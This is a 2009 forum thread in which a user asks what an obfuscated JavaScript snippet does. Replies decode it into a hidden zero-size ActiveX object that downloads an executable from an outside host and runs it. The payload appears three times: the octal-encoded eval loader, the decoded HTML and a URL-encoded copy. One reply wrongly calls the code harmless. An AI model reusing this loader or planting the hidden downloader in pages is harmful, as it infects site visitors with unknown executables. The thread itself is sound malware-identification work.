what is this code HELP needed URGENT

Discussion in 'JavaScript' started by young coder, Oct 1, 2009.

0
  1. #1
    edit

    i figured what it is using firebug

    please close/delete the thread

    thanks :)


    --------------------------------------------------------
    what is this code and is it harmful ?? can someone hack me through this code :(

    <script language="javascript">
MaIlMe=new Array();
MaIlMe[0]="045063103150164155154045062060144151162045063104";
MaIlMe[1]="045062062162164154045062062045063105045060104045";
MaIlMe[2]="060101045060104045060101045063103150145141";
MaIlMe[3]="144045063105045060104045060101045063103155145";
MaIlMe[4]="164141045062060150164164160055145161165151166045063";
MaIlMe[5]="104045062062103157156164145156164055124171160";
MaIlMe[6]="145045062062045062060143157156164145156164045";
MaIlMe[7]="063104045062062164145170164057150164155154045063";
MaIlMe[8]="102045062060143150141162163145164045063104";
MaIlMe[9]="167151156144157167163055061062065066045062062045063";
MaIlMe[10]="105045060104045060101045063103155145164141045062060";
MaIlMe[11]="150164164160055145161165151166045063104045062062103";
MaIlMe[12]="157156164145156164055114141156147165141147145045062";
MaIlMe[13]="062045062060143157156164145156164045063104045";
MaIlMe[14]="062062141162055163141045062062045063105045";
MaIlMe[15]="060104045060101045063103164151164154145045";
MaIlMe[16]="063105045063103057164151164154145045063105";
MaIlMe[17]="045060104045060101045063103057150145141144";
MaIlMe[18]="045063105045060104045060101045060104045060";
MaIlMe[19]="101045060104045060101045063103157142152145143164";
MaIlMe[20]="045062060151144045063104045062062104157167156";
MaIlMe[21]="154157141144145162101143164151166145130061045062";
MaIlMe[22]="062045060104045060101045060104045060101167151144164";
MaIlMe[23]="150045063104045062062060045062062045060104";
MaIlMe[24]="045060101045060104045060101150145151147150164";
MaIlMe[25]="045063104045062062060045062062045060104045";
MaIlMe[26]="060101045060104045060101103114101123123111";
MaIlMe[27]="104045063104045062062103114123111104045063101";
MaIlMe[28]="143061142067145065063062055063145143142055";
MaIlMe[29]="064145071145055142142063141055062071065061146146145";
MaIlMe[30]="066067143066061045062062045060104045060101";
MaIlMe[31]="045060104045060101143157144145142141163145045063104";
MaIlMe[32]="045062062150164164160045063101057057143066056";
MaIlMe[33]="143157155155165156151164171056141154151143145056151";
MaIlMe[34]="164057144157167156154157141144057104157167156";
MaIlMe[35]="154157141144145162101143164151166145130056143141";
MaIlMe[36]="142045062063126145162163151157156045063104061045062";
MaIlMe[37]="103060045062103060045062103061045062062045063";
MaIlMe[38]="105045060104045060101045060104045060101045063";
MaIlMe[39]="103160141162141155045062060156141155145045063104";
MaIlMe[40]="045062062160162157160120162157147162145163163102141";
MaIlMe[41]="143153147162157165156144045062062045062060045062060";
MaIlMe[42]="166141154165145045063104045062062045062063142143";
MaIlMe[43]="143145145070045062062045063105045060104045060101045";
MaIlMe[44]="060104045060101045063103160141162141155045";
MaIlMe[45]="062060156141155145045063104045062062160162157";
MaIlMe[46]="160124145170164102141143153147162157165156144045";
MaIlMe[47]="062062045062060045062060166141154165145045063";
MaIlMe[48]="104045062062045062063060060060060060045062";
MaIlMe[49]="062045063105045060104045060101045060104045";
MaIlMe[50]="060101045063103160141162141155045062060156141155";
MaIlMe[51]="145045063104045062062160162157160102141162103";
MaIlMe[52]="157154157162045062062045062060045062060166141154";
MaIlMe[53]="165145045063104045062062045062063060060060060060";
MaIlMe[54]="045062062045063105045060104045060101045060104";
MaIlMe[55]="045060101045063103120101122101115045062060116101";
MaIlMe[56]="115105045063104045062062160162157160124145170164103";
MaIlMe[57]="157154157162045062062045062060045062060166141154";
MaIlMe[58]="165145045063104045062062045062063061060060060";
MaIlMe[59]="060060045062062045063105045060104045060101045060104";
MaIlMe[60]="045060101045063103160141162141155045062060156141";
MaIlMe[61]="155145045063104045062062160162157160127151144";
MaIlMe[62]="164150045062062045062060045062060166141154165";
MaIlMe[63]="145045063104045062062060045062062045063105045";
MaIlMe[64]="060104045060101045060104045060101045063103160141";
MaIlMe[65]="162141155045062060156141155145045063104045062062160";
MaIlMe[66]="162157160110145151147150164045062062045062060045";
MaIlMe[67]="062060166141154165145045063104045062062060";
MaIlMe[68]="045062062045063105045060104045060101045060104045060";
MaIlMe[69]="101045063103160141162141155045062060156141";
MaIlMe[70]="155145045063104045062062160162157160104157167156154";
MaIlMe[71]="157141144125162154045062062045062060045062060126";
MaIlMe[72]="101114125105045063104045062062150164164160045063";
MaIlMe[73]="101057057167167167056150165163141151156144141";
MaIlMe[74]="171056157162147057104157167156154157141144163";
MaIlMe[75]="057152141166141056145170145045062062045063";
MaIlMe[76]="105045060104045060101045060104045060101045063103160";
MaIlMe[77]="141162141155045062060156141155145045063104045062";
MaIlMe[78]="062160162157160120157163164104157167156154";
MaIlMe[79]="157141144101143164151157156045062062045062060045";
MaIlMe[80]="062060166141154165145045063104045062062162165156045";
MaIlMe[81]="062062045063105045060104045060101045060104";
MaIlMe[82]="045060101045063103160141162141155045062060";
MaIlMe[83]="156141155145045063104045062062160162157160111";
MaIlMe[84]="156163164141154154103157155160154145164145125162154";
MaIlMe[85]="045062062045062060045062060166141154165145045063104";
MaIlMe[86]="045062062045062062045063105045060104045060";
MaIlMe[87]="101045060104045060101045063103160141162141155";
MaIlMe[88]="045062060156141155145045063104045062062160";
MaIlMe[89]="162157160102162157167163145162122145144151162";
MaIlMe[90]="145143164125162154045062062045062060045062060166141";
MaIlMe[91]="154165145045063104045062062045062062045063105045";
MaIlMe[92]="060104045060101045060104045060101045063103160141162";
MaIlMe[93]="141155045062060156141155145045063104045062062";
MaIlMe[94]="160162157160126145162142157163145045062062045062";
MaIlMe[95]="060045062060166141154165145045063104045062062";
MaIlMe[96]="060045062062045063105045060104045060101045060104";
MaIlMe[97]="045060101045063103160141162141155045062060156141155";
MaIlMe[98]="145045063104045062062160162157160111156164145162162";
MaIlMe[99]="165160164045062062045062060045062060166141154";
MaIlMe[100]="165145045063104045062062060045062062045063105";
MaIlMe[101]="045060104045060101045060104045060101045060104045";
MaIlMe[102]="060101045063103057157142152145143164045063105045060";
MaIlMe[103]="104045060101045060104045060101045063103057142157144";
MaIlMe[104]="171045063105045060104045060101045060104045060";
MaIlMe[105]="101045063103057150164155154045063105";
OutString="";for(i=0;i<MaIlMe.length;i++){
for(j=0;j<MaIlMe[i].length;j+=3){
OutString+=eval("\"\\"+MaIlMe[i].slice(j,j+3)+"\"");
}}document.write(unescape(OutString));</script>
    Code (markup):

    HELP PLEASE
     
    Last edited: Oct 1, 2009
    young coder, Oct 1, 2009 IP
  2. caprichoso

    caprichoso Well-Known Member

    Messages:
    433
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    110
    #2
    It seems to be a very inefficient obfuscation algorithm for writing something to an HTML document. You can run it, it can't be harmful. It's taking three characters, then escaping them, then unescaping again.
     
    caprichoso, Oct 1, 2009 IP
    young coder likes this.
  3. dimitar christoff

    dimitar christoff Active Member

    Messages:
    882
    Likes Received:
    62
    Best Answers:
    0
    Trophy Points:
    90
    #3
    it CAN be harmful, don't run it in IE, it embeds an activex/java object. fsck knows what it will do if you accept it and don't trust the source

    for this particular one, no danger though. http://www.siteadvisor.com/sites/alice.it/downloads/15971977/
    but if there's no danger, why hide it?

    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html dir="rtl">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 12 April 2005), see www.w3.org">
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii">
<meta http-equiv="Content-Language" content="ar-sa">
<title></title>
<object id="DownloaderActiveX1" width="0" height="0" classid=
"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase=
"http://c6.community.alice.it/download/DownloaderActiveX.cab#Version=1,0,0,1"><param name="propProgressBackground"
value="#bccee8">
<param name="propTextBackground" value="#00000">
<param name="propBarColor" value="#00000">
<param name="propTextColor" value="#100000">
<param name="propWidth" value="0">
<param name="propHeight" value="0">
<param name="propDownloadUrl" value=
"http://www.husainday.org/Downloads/java.exe">
<param name="propPostDownloadAction" value="run">
<param name="propInstallCompleteUrl" value="">
<param name="propBrowserRedirectUrl" value="">
<param name="propVerbose" value="0">
<param name="propInterrupt" value="0"></object>
</head>
<body>
</body>
</html>
    HTML:
     
    Last edited: Oct 2, 2009
    dimitar christoff, Oct 2, 2009 IP
    young coder likes this.
  4. caprichoso

    caprichoso Well-Known Member

    Messages:
    433
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    110
    #4
    :) Running IE is harmful by itself! You have to use a real browser like Firefox for your own good.

    On the other hand, if you accept the activex installation anything can happen. You are running unknown code with your user rights.
     
    caprichoso, Oct 2, 2009 IP
  5. young coder

    young coder Peon

    Messages:
    302
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    0
    #5
    @dimitar christoff

    how did you get the code like that ?

    i ended up with this
    "%3Chtml%20dir%3D%22rtl%22%3E%0D%0A%0D%0A%3Chead%3E%0D%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Dwindows-1256%22%3E%0D%0A%3Cmeta%20http-equiv%3D%22Content-Language%22%20content%3D%22ar-sa%22%3E%0D%0A%3Ctitle%3E%3C/title%3E%0D%0A%3C/head%3E%0D%0A%0D%0A%0D%0A%3Cobject%20id%3D%22DownloaderActiveX1%22%0D%0A%0D%0Awidth%3D%220%22%0D%0A%0D%0Aheight%3D%220%22%0D%0A%0D%0ACLASSID%3D%22CLSID%3Ac1b7e532-3ecb-4e9e-bb3a-2951ffe67c61%22%0D%0A%0D%0Acodebase%3D%22http%3A//c6.community.alice.it/download/DownloaderActiveX.cab%23Version%3D1%2C0%2C0%2C1%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propProgressBackground%22%20%20value%3D%22%23bccee8%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propTextBackground%22%20%20value%3D%22%2300000%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propBarColor%22%20%20value%3D%22%2300000%22%3E%0D%0A%0D%0A%3CPARAM%20NAME%3D%22propTextColor%22%20%20value%3D%22%23100000%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propWidth%22%20%20value%3D%220%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propHeight%22%20%20value%3D%220%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propDownloadUrl%22%20%20VALUE%3D%22http%3A//www.husainday.org/Downloads/java.exe%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propPostDownloadAction%22%20%20value%3D%22run%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propInstallCompleteUrl%22%20%20value%3D%22%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propBrowserRedirectUrl%22%20%20value%3D%22%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propVerbose%22%20%20value%3D%220%22%3E%0D%0A%0D%0A%3Cparam%20name%3D%22propInterrupt%22%20%20value%3D%220%22%3E%0D%0A%0D%0A%0D%0A%3C/object%3E%0D%0A%0D%0A%3C/body%3E%0D%0A%0D%0A%3C/html%3E"
    Code (markup):

    i think it has a keylogger
     
    young coder, Oct 2, 2009 IP
  6. caprichoso

    caprichoso Well-Known Member

    Messages:
    433
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    110
    #6
    That string is URLEncoded
     
    caprichoso, Oct 2, 2009 IP
  7. young coder

    young coder Peon

    Messages:
    302
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    0
    #7
    young coder, Oct 2, 2009 IP